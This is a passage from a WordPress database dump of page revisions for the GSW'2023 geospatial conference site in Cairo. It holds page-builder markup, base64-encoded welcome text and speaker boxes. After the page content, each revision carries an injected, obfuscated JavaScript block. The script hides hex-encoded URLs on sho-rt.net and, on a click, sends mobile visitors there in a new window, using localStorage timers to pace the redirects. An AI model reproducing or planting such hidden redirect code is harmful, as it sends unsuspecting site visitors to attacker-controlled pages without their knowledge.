CUyMGluY3JlZGlibGUlMkMlMjBoYWxmLWZvcmdvdHRlbiUyMG1vbnVtZW50JTIweW91JTIwbWlnaHQlMjBzdHVtYmxlJTIwYWNyb3NzJTIwd2hpbGUlMjB3YW5kZXJpbmclMjBhcm91bmQuJTIwRW5qb3klMjB0aGUlMjBOaWxlJTIwdmlldyUyQyUyMHZpc2l0JTIwdGhlJTIwZ3JlYXQlMjBweXJhbWlkcyUyMG9mJTIwR2l6YSUyQyUyMHdhbGslMjB0aHJvdWdoJTIwdGhlJTIwY2FwaXRhbCUyN3MlMjBtZWRpZXZhbCUyMG1hcmtldHMlMjBieSUyMEtoYW4lMjBFbC1LaGFsaWxpJTJDJTIwb3IlMjB3YWxrJTIwZG93biUyMHRoZSUyME5pbGUlMjBwcm9tZW5hZGUuJTIwV2UlMjBsb29rJTIwZm9yd2FyZCUyMHRvJTIwd29ya2luZyUyMHdpdGglMjB0aGUlMjBJU1BSUyUyMGNvdW5jaWwlMkMlMjBjb21taXNzaW9ucyUyMHByZXNpZGVudHMlMkMlMjB3b3JraW5nJTIwZ3JvdXAlMjBvZmZpY2VycyUyQyUyMGFuZCUyMG90aGVyJTIwc2lzdGVyJTIwb3JnYW5pemF0aW9ucyUyMHRvJTIwaGF2ZSUyMGElMjBzdWNjZXNzZnVsJTIwdGVjaG5pY2FsJTIwcHJvZ3JhbSUyMGFuZCUyMGElMjBtZW1vcmFibGUlMjBzb2NpYWwlMjBwcm9ncmFtLiUyMEl0JTIwaXMlMjBncmVhdCUyMHRvJTIwaGF2ZSUyMHRoZSUyMEdTVyUyMGNvbWluZyUyMHRvJTIwRWd5cHQlMjB3aGVyZSUyMG1vc3QlMjBwcm9iYWJseSUyMHRoZSUyMGZpcnN0JTIwbWFwcGluZyUyMHN5c3RlbXMlMjB3ZXJlJTIwZGV2ZWxvcGVkJTIwMTAwMHMlMjB5ZWFycyUyMGFnby4lMjBXZWxjb21lJTIwdG8lMjBHU1clMjcyMDIzJTIwaW4lMjBDYWlybyUyQyUyMEVneXB0LiUzQyUyRnAlM0U=[/vc_raw_html][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1529519814966{padding-top: 40px !important;padding-bottom: 40px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #8426B0), color-stop(54%, #BD0282), color-stop(95%, #EC4B3C));background: -moz-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: -webkit-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: -o-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: -ms-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"``The time is always right to do what is right!``\" main_heading_color=\"#ffffff\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^1900|url^https://gsw2023.com/wp-content/uploads/2018/06/trade10.jpg|caption^null|alt^null|title^trade10|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"Have a project you\'d like to talk about?\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Sed consequat erat vitae odio placerat, vel malesuada mi convallis we can help![/ultimate_heading][dt_default_button link=\"url:%2Fsoftware-company%2Fcontact%2F|||\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1529527073081{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][dt_default_button link=\"url:%2Fsoftware-company%2Fshowcase%2F|||\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1529527107907{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]VIEW SHOWCASE[/dt_default_button][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home','','inherit','closed','closed','','2167-revision-v1','','','2022-10-05 18:02:08','2022-10-05 18:02:08','',2167,'https://gsw2023.com/?p=2297',0,'revision','',0),
(2298,1,'2022-10-05 18:03:02','2022-10-05 18:03:02','<p>[vc_row equal_height=\"yes\" content_placement=\"middle\" type=\"vc_default\" margin_top=\"5\" margin_bottom=\"10\" css=\".vc_custom_1529515723794{padding-top: 70px !important;padding-bottom: 55px !important;}\"][vc_column parallax=\"content-moving\" offset=\"vc_col-lg-offset-2 vc_col-lg-8 vc_col-md-offset-1 vc_col-md-10\"][ultimate_heading main_heading=\"Egypt GSW\'2023 -The First Geospatial Week in Africa and The Middle East\" sub_heading_color=\"#333333\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"150\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:70px;\" margin_design_tab_text=\"\"][/ultimate_heading][vc_row_inner][vc_column_inner width=\"5/12\"][bsf-info-box icon_type=\"custom\" icon_img=\"id^2271|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-ismael-1.png|caption^null|alt^null|title^dr-ismael|description^null\" img_width=\"100\" title=\"Prof. Ismail AbdelGhafar\" heading_tag=\"h5\" read_more=\"box\" link=\"url:%2Fsoftware-company%2Fservices%2Fweb-application-development%2F|||\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]</p>\n<h6><strong>President Arab Academy for Science, Technology and Maritime Transport</strong></h6>\n<p>[/bsf-info-box][/vc_column_inner][vc_column_inner width=\"1/3\"][bsf-info-box icon_type=\"custom\" icon_img=\"id^2272|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-naser.jpg|caption^null|alt^null|title^dr-naser|description^null\" img_width=\"100\" icon_style=\"advanced\" icon_border_spacing=\"100\" title=\"Prof. Naser El-Sheimy\" heading_tag=\"h5\" read_more=\"box\" link=\"url:%2Fsoftware-company%2Fservices%2Fsoftware-dedicated-team%2F|||\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]</p>\n<h6>Geospatial Week Director ,The University of Calgary</h6>\n<p>[/bsf-info-box][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column][vc_raw_html]JTNDcCUyMHN0eWxlJTNEJTIydGV4dC1hbGlnbiUzQSUyMGp1c3RpZnklM0IlMjIlMkMlMjJzdHlsZSUzRGNvbG9yJTNBYmxhY2slMjIlM0IlM0VBcyUyMHdlJTIwY2VsZWJyYXRlJTIwb3VyJTIwNTB0aCUyMGFubml2ZXJzYXJ5JTJDJTIwdGhlJTIwQXJhYiUyMEFjYWRlbXklMjBmb3IlMjBTY2llbmNlJTJDJTIwVGVjaG5vbG9neSUyQyUyMGFuZCUyME1hcml0aW1lJTIwVHJhbnNwb3J0JTIwJTI4QUFTVE1UJTI5JTIwaXMlMjBob25vcmVkJTIwdG8lMjBob3N0JTIwdGhlJTIwSVNQUlMlMjBmaXJzdCUyMEdlb3NwYXRpYWwlMjBXZWVrJTIwaW4lMjBBZnJpY2ElMjBhbmQlMjBNaWRkbGUlMjBFYXN0JTIwaW4lMjAyMDIzJTIwJTI4R1NXLTIwMjMlMjklMjB0aGF0JTIwd2lsbCUyMGJlJTIwaGVsZCUyMHVuZGVyJTIwdGhlJTIwYXVzcGljZXMlMjBvZiUyMEguRSUyMFNlY3JldGFyeS1HZW5lcmFsJTIwb2YlMjB0aGUlMjBMZWFndWUlMjBvZiUyMEFyYWIlMjBTdGF0ZXMuJTIwVGhlJTIwY29uZmVyZW5jZSUyMHdpbGwlMjBiZSUyMGhlbGQlMjBpbiUyMFNlcHRlbWJlciUyMDIwMjMlMkMlMjBhdCUyMHRoZSUyMEludGVyQ29udGluZW50YWwlMjBDYWlybyUyMENpdHklMjBzdGFycyUyMENhaXJvJTJDJTIwRWd5cHQuJTIwQUFTVE1UJTIwc3Ryb25nbHklMjBiZWxpZXZlcyUyMHRoYXQlMjBzY2llbmNlJTIwaXMlMjB0aGUlMjBrZXklMjB0byUyMHRoZSUyMGZ1dHVyZSUyMGFuZCUyMHRoZSUyMGNvcm5lcnN0b25lJTIwZm9yJTIwbmF0aW9ucyUyNyUyMHByb2dyZXNzJTIwYW5kJTIwcHJvc3Blcml0eS4lMjBJdCUyMGlzJTIwdGhlJTIwcHJpbWFyeSUyMGZhY3RvciUyMGZvciUyMGh1bWFuJTIwYWNoaWV2ZW1lbnRzJTIwdGhyb3VnaG91dCUyMGFsbCUyMGFnZXMuJTIwQUFTVE1UJTIwaGFzJTIwYSUyMGhvc3QlMjBvZiUyMHF1YWxpZmllZCUyMHByb2Zlc3NvcnMlMjBhbmQlMjBleHBlcnRzJTIwd2hvJTIwYXJlJTIwY2FwYWJsZSUyMG9mJTIwc3VwcG9ydGluZyUyMEFyYWIlMjBhbmQlMjBBZnJpY2FuJTIwY291bnRyaWVzJTIwaW4lMjB2YXJpb3VzJTIwc2NpZW50aWZpYyUyMGZpZWxkcy4lMjBUaGUlMjBHU1clMjB3aWxsJTIwcHJvdmlkZSUyMGElMjBwbGF0Zm9ybSUyMGZvciUyMGludGVybmF0aW9uYWwlMjBzY2hvbGFycyUyQyUyMGdyYWR1YXRlJTIwc3R1ZGVudHMlMkMlMjBmdXR1cmUlMjBzY2llbnRpc3RzJTIwYW5kJTIwaW5kdXN0cmlhbCUyMHNlY3RvcnMlMjB0byUyMGxlYXJuJTIwZXhjaGFuZ2UlMjBrbm93bGVkZ2UlMjBhbmQlMjBleHBlcmllbmNlcyUyMG9mJTIwYXBwbHlpbmclMjBnZW9zcGF0aWFsJTIwdGVjaG5vbG9naWVzJTIwZm9yJTIwc3VzdGFpbmFibGUlMjBkZXZlbG9wbWVudCUyMGZvciUyMGJldHRlciUyMHF1YWxpdHklMjBvZiUyMGxpZmUlMjBmb3IlMjBwZW9wbGUlMjBhcm91bmQlMjB0aGUlMjB3b3JsZC4lMjBXZSUyMHdvdWxkJTIwbGlrZSUyMHRvJTIwdGFrZSUyMHRoaXMlMjBvcHBvcnR1bml0eSUyMHRvJTIwd2VsY29tZSUyMHlvdSUyMHRvJTIwQ2Fpcm8lMjBhJTIwdmlicmFudCUyQyUyMGV4aGlsYXJhdGluZyUyQyUyMGV4b3RpYyUyQyUyMGZhc2NpbmF0aW5nJTIwYW5kJTIwd2VsY29taW5nJTIwY2l0eS4lMjBIb21lJTIwdG8lMjB0aGUlMjBiZXN0JTIwUGhhcmFvbmljJTJDJTIwQ29wdGljJTIwYW5kJTIwSXNsYW1pYyUyMHNpZ2h0cyUyMGluJTIwRWd5cHQuJTIwQ2Fpcm8lMjBpcyUyMHdoZXJlJTIweW91JTIwbmV2ZXIlMjBrbm93JTIwd2hhdCUyMGluY3JlZGlibGUlMkMlMjBoYWxmLWZvcmdvdHRlbiUyMG1vbnVtZW50JTIweW91JTIwbWlnaHQlMjBzdHVtYmxlJTIwYWNyb3NzJTIwd2hpbGUlMjB3YW5kZXJpbmclMjBhcm91bmQuJTIwRW5qb3klMjB0aGUlMjBOaWxlJTIwdmlldyUyQyUyMHZpc2l0JTIwdGhlJTIwZ3JlYXQlMjBweXJhbWlkcyUyMG9mJTIwR2l6YSUyQyUyMHdhbGslMjB0aHJvdWdoJTIwdGhlJTIwY2FwaXRhbCUyN3MlMjBtZWRpZXZhbCUyMG1hcmtldHMlMjBieSUyMEtoYW4lMjBFbC1LaGFsaWxpJTJDJTIwb3IlMjB3YWxrJTIwZG93biUyMHRoZSUyME5pbGUlMjBwcm9tZW5hZGUuJTIwV2UlMjBsb29rJTIwZm9yd2FyZCUyMHRvJTIwd29ya2luZyUyMHdpdGglMjB0aGUlMjBJU1BSUyUyMGNvdW5jaWwlMkMlMjBjb21taXNzaW9ucyUyMHByZXNpZGVudHMlMkMlMjB3b3JraW5nJTIwZ3JvdXAlMjBvZmZpY2VycyUyQyUyMGFuZCUyMG90aGVyJTIwc2lzdGVyJTIwb3JnYW5pemF0aW9ucyUyMHRvJTIwaGF2ZSUyMGElMjBzdWNjZXNzZnVsJTIwdGVjaG5pY2FsJTIwcHJvZ3JhbSUyMGFuZCUyMGElMjBtZW1vcmFibGUlMjBzb2NpYWwlMjBwcm9ncmFtLiUyMEl0JTIwaXMlMjBncmVhdCUyMHRvJTIwaGF2ZSUyMHRoZSUyMEdTVyUyMGNvbWluZyUyMHRvJTIwRWd5cHQlMjB3aGVyZSUyMG1vc3QlMjBwcm9iYWJseSUyMHRoZSUyMGZpcnN0JTIwbWFwcGluZyUyMHN5c3RlbXMlMjB3ZXJlJTIwZGV2ZWxvcGVkJTIwMTAwMHMlMjB5ZWFycyUyMGFnby4lMjBXZWxjb21lJTIwdG8lMjBHU1clMjcyMDIzJTIwaW4lMjBDYWlybyUyQyUyMEVneXB0LiUzQyUyRnAlM0U=[/vc_raw_html][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1529519814966{padding-top: 40px !important;padding-bottom: 40px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #8426B0), color-stop(54%, #BD0282), color-stop(95%, #EC4B3C));background: -moz-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: -webkit-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: -o-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: -ms-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"``The time is always right to do what is right!``\" main_heading_color=\"#ffffff\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^1900|url^https://gsw2023.com/wp-content/uploads/2018/06/trade10.jpg|caption^null|alt^null|title^trade10|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"Have a project you\'d like to talk about?\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Sed consequat erat vitae odio placerat, vel malesuada mi convallis we can help![/ultimate_heading][dt_default_button link=\"url:%2Fsoftware-company%2Fcontact%2F|||\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1529527073081{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][dt_default_button link=\"url:%2Fsoftware-company%2Fshowcase%2F|||\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1529527107907{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]VIEW SHOWCASE[/dt_default_button][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return 